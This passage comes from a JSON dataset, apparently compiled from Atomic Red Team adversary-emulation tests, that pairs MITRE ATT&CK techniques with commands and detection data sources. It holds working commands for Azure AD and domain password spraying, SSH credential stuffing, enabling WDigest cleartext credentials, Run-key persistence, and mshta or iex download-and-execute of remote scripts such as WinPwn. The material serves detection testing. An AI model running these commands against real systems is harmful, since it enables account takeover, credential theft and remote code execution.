\"#{password}\" -AsPlainText -Force\n\n$Users | Foreach-Object {\n $user = $_.UserPrincipalName\n $Credential = New-Object -TypeName System.Management.Automation.PSCredential -ArgumentList \"$user\", $Pword\n try {\n Write-Host \" [-] Attempting #{password} on account ${user}.\"\n Connect-AzureAD -Credential $Credential 2>&1> $null\n # if credentials aren't correct, it will break just above and goes into catch block, so if we're here we can display success\n Write-Host \" [!] ${user}:#{password} are valid credentials!`r`n\"\n Disconnect-AzureAD > $null\n } catch {\n Write-Host \" [-] ${user}:#{password} invalid credentials.`r`n\"\n }\n}\nWrite-Host \"End of password spraying\"\n" + } + }, + { + "name": "WinPwn - DomainPasswordSpray Attacks", + "auto_generated_guid": "5ccf4bbd-7bf6-43fc-83ac-d9e38aff1d82", + "description": "DomainPasswordSpray Attacks technique via function of WinPwn", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "$S3cur3Th1sSh1t_repo='https://raw.githubusercontent.com/S3cur3Th1sSh1t'\niex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')\ndomainpassspray -consoleoutput -noninteractive -emptypasswords", + "name": "powershell" + } + }, + { + "name": "Password Spray Invoke-DomainPasswordSpray Light", + "auto_generated_guid": "b15bc9a5-a4f3-4879-9304-ea0011ace63a", + "description": "Perform a domain password spray using the same core method of the [DomainPasswordSpray tool](https://github.com/dafthack/DomainPasswordSpray) \nbut without all the extra code that makes the script get blocked by many AVs. \nThis atomic test will attempt a single password against all users in a password list at $env:Temp\\usersdpsLight.txt. You can create this file manually\nor with the automated prereq_command. 
The prereq_command will limit the user list to 200 users by default to help you avoid massive account lockout.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "user_limit": { + "description": "The max number of users to put in the list when running the prereq_command", + "type": "Integer", + "default": 200 + }, + "password": { + "description": "The password to try for each user in users.txt", + "type": "String", + "default": "Spring2020" + } + }, + "dependencies": [ + { + "description": "Username file must exist at $env:Temp\\usersdpsLight.txt\n", + "prereq_command": "if (Test-Path $env:Temp\\usersdpsLight.txt) {exit 0} else {exit 1}\n", + "get_prereq_command": "Write-Host -NoNewLine \"Reading Users.\" # this code modifed from https://github.com/ZoomerHulkHogan/Powershell-Domain-User-Enumeration\n$netOutput = net users /domain\n$netOutput = [System.Collections.ArrayList]($netOutput[6..($netOutput.length-3)])\n$userLimit = #{user_limit}; $usercount = 0\nforeach ($line in $netOutput) {\n if($usercount -ge $userLimit){break}\n $line = $line.trim()\n $line = $line -split '\\s\\s+'\n foreach ($user in $line){\n if($usercount -ge $userLimit){break}\n Add-Content $env:Temp\\usersdpsLight.txt $user\n $usercount = $usercount + 1\n } \n}\nWrite-Host \"Usernames saved to $env:Temp\\usersdpsLight.txt\"\n" + } + ], + "executor": { + "name": "powershell", + "elevation_required": false, + "command": "function Invoke-dpsLight ($Password, $userlist) {\n$users = Get-Content $userlist\n$Domain = \"LDAP://\" + ([ADSI]\"\").distinguishedName\nforeach ($User in $users) {\n $Domain_check = New-Object System.DirectoryServices.DirectoryEntry($Domain, $User, $Password)\n if ($Domain_check.name -ne $null) {\n Write-Host -ForegroundColor Green \"Password found for User:$User Password:$Password\"\n }\n else { Write-Host \". 
\" -NoNewline}\n}\nWrite-Host -ForegroundColor green \"Finished\"\n}\nInvoke-dpsLight \"#{password}\" $env:Temp\\usersdpsLight.txt\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + "https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1110.004", + "command_list": [ + "cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@localhost;done\n" + ], + "commands": [ + { + "command": "cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@localhost;done\n", + "source": 
"atomics/T1110.004/T1110.004.yaml", + "name": "Atomic Red Team Test - Brute Force: Credential Stuffing" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1110.004", + "display_name": "Brute Force: Credential Stuffing", + "atomic_tests": [ + { + "name": "SSH Credential Stuffing From Linux", + "auto_generated_guid": "4f08197a-2a8a-472d-9589-cd2895ef22ad", + "description": "Using username,password combination from a password dump to login over SSH.\n", + "supported_platforms": [ + "linux" + ], + "input_arguments": { + "target_host": { + "description": "IP Address / Hostname you want to target.", + "type": "String", + "default": "localhost" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Requires SSHPASS\n", + "prereq_command": "if [ -x \"$(command -v sshpass)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "if [ $(cat /etc/os-release | grep -i ID=ubuntu) ] || [ $(cat /etc/os-release | grep -i ID=kali) ]; then sudo apt update && sudo apt install sshpass -y; else echo \"This test requires sshpass\" ; fi ;\n" + } + ], + "executor": { + "name": "bash", + "elevation_required": false, + "command": "cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@#{target_host};done\n" + } + }, + { + "name": "SSH Credential Stuffing From MacOS", + "auto_generated_guid": "d546a3d9-0be5-40c7-ad82-5a7d79e1b66b", + "description": "Using username,password combination from a password dump to login over SSH.\n", + "supported_platforms": [ + "macos" + ], + "input_arguments": { + "target_host": { + "description": "IP Address / Hostname you want to target.", + "type": "String", + "default": "localhost" + } + }, + "dependency_executor_name": "bash", + "dependencies": [ + { + "description": "Requires SSHPASS\n", + "prereq_command": "if [ -x \"$(command 
-v sshpass)\" ]; then exit 0; else exit 1; fi;\n", + "get_prereq_command": "/bin/bash -c \"$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/e8114640740938c20cc41ffdbf07816b428afc49/install.sh)\"\nbrew install hudochenkov/sshpass/sshpass\n" + } + ], + "executor": { + "name": "bash", + "elevation_required": false, + "command": "cp $PathToAtomicsFolder/T1110.004/src/credstuffuserpass.txt /tmp/\nfor unamepass in $(cat /tmp/credstuffuserpass.txt);do sshpass -p `echo $unamepass | cut -d\":\" -f2` ssh -o 'StrictHostKeyChecking=no' `echo $unamepass | cut -d\":\" -f1`@#{target_host};done\n" + } + } + ] + } + ], + "queries": [], + "possible_detections": [ + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "computer" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "application" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate to", + "target_data_element": "cloud service" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "ip" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "user", + "relationship": "attempted to authenticate from", + "target_data_element": "port" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. 
It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "application", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "user account", + "definition": "The representation of a user, device, service or application that access resources within a network environment. It has login capabilities and can be authenticated by an operating system, application or platform.", + "collection_layers": [ + "host", + "cloud", + "container" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Azure AD", + "Containers", + "Google Workspace" + ], + "data_component": "user account authentication", + "description": "A user account authenticated onto a system.", + "source_data_element": "cloud service", + "relationship": "attempted to authenticate", + "target_data_element": "user" + }, + { + "data_source": "application log", + "definition": "Logs from events in third-party applications (mail server, web applications, etc.).", + "collection_layers": [ + "host", + "cloud" + ], + "data_source_platform": [ + "Windows", + "Linux", + "macOS", + "IaaS", + "SaaS", + "Office 365", + "Google Workspace" + ], + "data_component": "application log content", + "description": "Data captured in an application log.", + "source_data_element": "application log", + "relationship": "contained", + "target_data_element": "application event entries" + } + ], + "external_reference": [ + [ + "https://docs.microsoft.com/en-us/windows/security/identity-protection/access-control/security-principals" + ], + [ + 
"https://confluence.atlassian.com/doc/working-with-confluence-logs-108364721.html" + ] + ] + }, + { + "technique_id": "T1112", + "command_list": [ + "reg add HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Advanced /t REG_DWORD /v HideFileExt /d 1 /f\n", + "reg add HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run /t REG_EXPAND_SZ /v SecurityHealth /d calc.exe /f\n", + "reg add HKLM\\SYSTEM\\CurrentControlSet\\Control\\SecurityProviders\\WDigest /v UseLogonCredential /t REG_DWORD /d 1 /f\n", + "$key= \"HKCU:\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\Domains\\bad-domain.com\\\"\n$name =\"bad-subdomain\"\nnew-item $key -Name $name -Force\nnew-itemproperty $key$name -Name https -Value 2 -Type DWORD;\nnew-itemproperty $key$name -Name http -Value 2 -Type DWORD;\nnew-itemproperty $key$name -Name * -Value 2 -Type DWORD;\n", + "New-ItemProperty \"HKCU:\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\" -Name T1112 -Value \"'\"\n", + null + ], + "commands": [ + { + "command": "mshta.exe javascript:a=(GetObject('script:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct')).Exec();close();\n", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell -noexit -file PathToAtomicsFolder\\T1218.005\\src\\powershell.ps1\"\":close\")\n", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "$var =Invoke-WebRequest \"#{hta_url}\"\n$var.content|out-file \"$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1218.005.hta\"\nmshta \"$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1218.005.hta\"\n", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic 
Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "$var =Invoke-WebRequest \"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/T1218.005.hta\"\n$var.content|out-file \"#{temp_file}\"\nmshta \"#{temp_file}\"\n", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine JScript -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath #{mshta_file_path}", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -HTAFilePath Test.hta -ScriptEngine #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath #{mshta_file_path}", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath $env:windir\\system32\\mshta.exe", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine JScript -SimulateUserDoubleClick", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -HTAFilePath Test.hta -ScriptEngine #{script_engine} -SimulateUserDoubleClick", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath $env:windir\\system32\\mshta.exe", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic 
Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -HTAUri https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta -MSHTAFilePath #{mshta_file_path}", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -UseRundll32 -Rundll32FilePath $env:windir\\system32\\rundll32.exe", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -ScriptEngine JScript -InlineProtocolHandler #{protocol_handler} -UseRundll32 -Rundll32FilePath #{rundll32_file_path}", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler About -UseRundll32 -Rundll32FilePath #{rundll32_file_path}", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -MSHTAFilePath $env:windir\\system32\\mshta.exe", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -ScriptEngine JScript -InlineProtocolHandler #{protocol_handler} -MSHTAFilePath #{mshta_file_path}", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler About -MSHTAFilePath #{mshta_file_path}", 
+ "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "Invoke-ATHHTMLApplication -TemplatePE -AsLocalUNCPath -MSHTAFilePath $env:windir\\system32\\mshta.exe", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": "mshta.exe \"about:'\"\n", + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + }, + { + "command": null, + "source": "atomics/T1218.005/T1218.005.yaml", + "name": "Atomic Red Team Test - Signed Binary Proxy Execution: Mshta" + } + ], + "parsed_datasets": [ + { + "attack_technique": "T1218.005", + "display_name": "Signed Binary Proxy Execution: Mshta", + "atomic_tests": [ + { + "name": "Mshta executes JavaScript Scheme Fetch Remote Payload With GetObject", + "auto_generated_guid": "1483fab9-4f52-4217-a9ce-daa9d7747cae", + "description": "Test execution of a remote script using mshta.exe. 
Upon execution calc.exe will be launched.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "file_url": { + "description": "location of the payload", + "type": "Url", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/mshta.sct" + } + }, + "executor": { + "command": "mshta.exe javascript:a=(GetObject('script:#{file_url}')).Exec();close();\n", + "name": "command_prompt" + } + }, + { + "name": "Mshta executes VBScript to execute malicious command", + "auto_generated_guid": "906865c3-e05f-4acc-85c4-fbc185455095", + "description": "Run a local VB script to run local user enumeration powershell command.\nThis attempts to emulate what FIN7 does with this technique which is using mshta.exe to execute VBScript to execute malicious code on victim systems.\nUpon execution, a new PowerShell windows will be opened that displays user information.\n", + "supported_platforms": [ + "windows" + ], + "executor": { + "command": "mshta vbscript:Execute(\"CreateObject(\"\"Wscript.Shell\"\").Run \"\"powershell -noexit -file PathToAtomicsFolder\\T1218.005\\src\\powershell.ps1\"\":close\")\n", + "name": "command_prompt" + } + }, + { + "name": "Mshta Executes Remote HTML Application (HTA)", + "auto_generated_guid": "c4b97eeb-5249-4455-a607-59f95485cb45", + "description": "Execute an arbitrary remote HTA. 
Upon execution calc.exe will be launched.\n", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "temp_file": { + "description": "temp_file location for hta", + "type": "String", + "default": "$env:appdata\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\T1218.005.hta" + }, + "hta_url": { + "description": "URL to HTA file for execution", + "type": "String", + "default": "https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1218.005/src/T1218.005.hta" + } + }, + "executor": { + "command": "$var =Invoke-WebRequest \"#{hta_url}\"\n$var.content|out-file \"#{temp_file}\"\nmshta \"#{temp_file}\"\n", + "cleanup_command": "remove-item \"#{temp_file}\" -ErrorAction Ignore\n", + "name": "powershell" + } + }, + { + "name": "Invoke HTML Application - Jscript Engine over Local UNC Simulating Lateral Movement", + "auto_generated_guid": "007e5672-2088-4853-a562-7490ddc19447", + "description": "Executes an HTA Application using JScript script engine using local UNC path simulating lateral movement.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "script_engine": { + "description": "Script Engine to use", + "type": "String", + "default": "JScript" + }, + "hta_file_path": { + "description": "HTA file name and or path to be used", + "type": "String", + "default": "Test.hta" + }, + "mshta_file_path": { + "description": "Location of mshta.exe", + "type": "String", + "default": "$env:windir\\system32\\mshta.exe" + } + }, + "dependencies": [ + { + "description": "The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.", + "prereq_command": "$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}", + "get_prereq_command": "Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force\n" + } + ], + "executor": { + 
"command": "Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -AsLocalUNCPath -SimulateLateralMovement -MSHTAFilePath #{mshta_file_path}", + "name": "powershell" + } + }, + { + "name": "Invoke HTML Application - Jscript Engine Simulating Double Click", + "auto_generated_guid": "58a193ec-131b-404e-b1ca-b35cf0b18c33", + "description": "Executes an HTA Application using JScript script engine simulating double click.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "script_engine": { + "description": "Script Engine to use", + "type": "String", + "default": "JScript" + }, + "hta_file_path": { + "description": "HTA file name and or path to be used", + "type": "String", + "default": "Test.hta" + } + }, + "dependencies": [ + { + "description": "The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.", + "prereq_command": "$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}", + "get_prereq_command": "Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force\n" + } + ], + "executor": { + "command": "Invoke-ATHHTMLApplication -HTAFilePath #{hta_file_path} -ScriptEngine #{script_engine} -SimulateUserDoubleClick", + "name": "powershell" + } + }, + { + "name": "Invoke HTML Application - Direct download from URI", + "auto_generated_guid": "39ceed55-f653-48ac-bd19-aceceaf525db", + "description": "Executes an HTA Application by directly downloading from remote URI.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "mshta_file_path": { + "description": "Location of mshta.exe", + "type": "String", + "default": "$env:windir\\system32\\mshta.exe" + }, + "hta_uri": { + "description": "URI to HTA", + "type": "Url", + "default": 
"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/24549e3866407c3080b95b6afebf78e8acd23352/atomics/T1218.005/src/T1218.005.hta" + } + }, + "dependencies": [ + { + "description": "The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.", + "prereq_command": "$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}", + "get_prereq_command": "Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force\n" + } + ], + "executor": { + "command": "Invoke-ATHHTMLApplication -HTAUri #{hta_uri} -MSHTAFilePath #{mshta_file_path}", + "name": "powershell" + } + }, + { + "name": "Invoke HTML Application - JScript Engine with Rundll32 and Inline Protocol Handler", + "auto_generated_guid": "e7e3a525-7612-4d68-a5d3-c4649181b8af", + "description": "Executes an HTA Application with JScript Engine, Rundll32 and Inline Protocol Handler.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "rundll32_file_path": { + "description": "Location of rundll32.exe", + "type": "Path", + "default": "$env:windir\\system32\\rundll32.exe" + }, + "script_engine": { + "description": "Script Engine to use", + "type": "String", + "default": "JScript" + }, + "protocol_handler": { + "description": "Protocol Handler to use", + "type": "String", + "default": "About" + } + }, + "dependencies": [ + { + "description": "The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.", + "prereq_command": "$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}", + "get_prereq_command": "Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force\n" + } + ], + "executor": { + 
"command": "Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -UseRundll32 -Rundll32FilePath #{rundll32_file_path}", + "name": "powershell" + } + }, + { + "name": "Invoke HTML Application - JScript Engine with Inline Protocol Handler", + "auto_generated_guid": "d3eaaf6a-cdb1-44a9-9ede-b6c337d0d840", + "description": "Executes an HTA Application with JScript Engine and Inline Protocol Handler.", + "supported_platforms": [ + "windows" + ], + "input_arguments": { + "mshta_file_path": { + "description": "Location of mshta.exe", + "type": "Path", + "default": "$env:windir\\system32\\mshta.exe" + }, + "script_engine": { + "description": "Script Engine to use", + "type": "String", + "default": "JScript" + }, + "protocol_handler": { + "description": "Protocol Handler to use", + "type": "String", + "default": "About" + } + }, + "dependencies": [ + { + "description": "The AtomicTestHarnesses module must be installed and Invoke-ATHHTMLApplication must be exported in the module.", + "prereq_command": "$RequiredModule = Get-Module -Name AtomicTestHarnesses -ListAvailable\nif (-not $RequiredModule) {exit 1}\nif (-not $RequiredModule.ExportedCommands['Invoke-ATHHTMLApplication']) {exit 1} else {exit 0}", + "get_prereq_command": "Install-Module -Name AtomicTestHarnesses -Scope CurrentUser -Force\n" + } + ], + "executor": { + "command": "Invoke-ATHHTMLApplication -ScriptEngine #{script_engine} -InlineProtocolHandler #{protocol_handler} -MSHTAFilePath #{mshta_file_path}", + "name": "powershell" + } + }, + { + "name": "Invoke HTML Application - Simulate Lateral Movement over UNC Path", + "auto_generated_guid": "b8a8bdb2-7eae-490d-8251-d5e0295b2362", 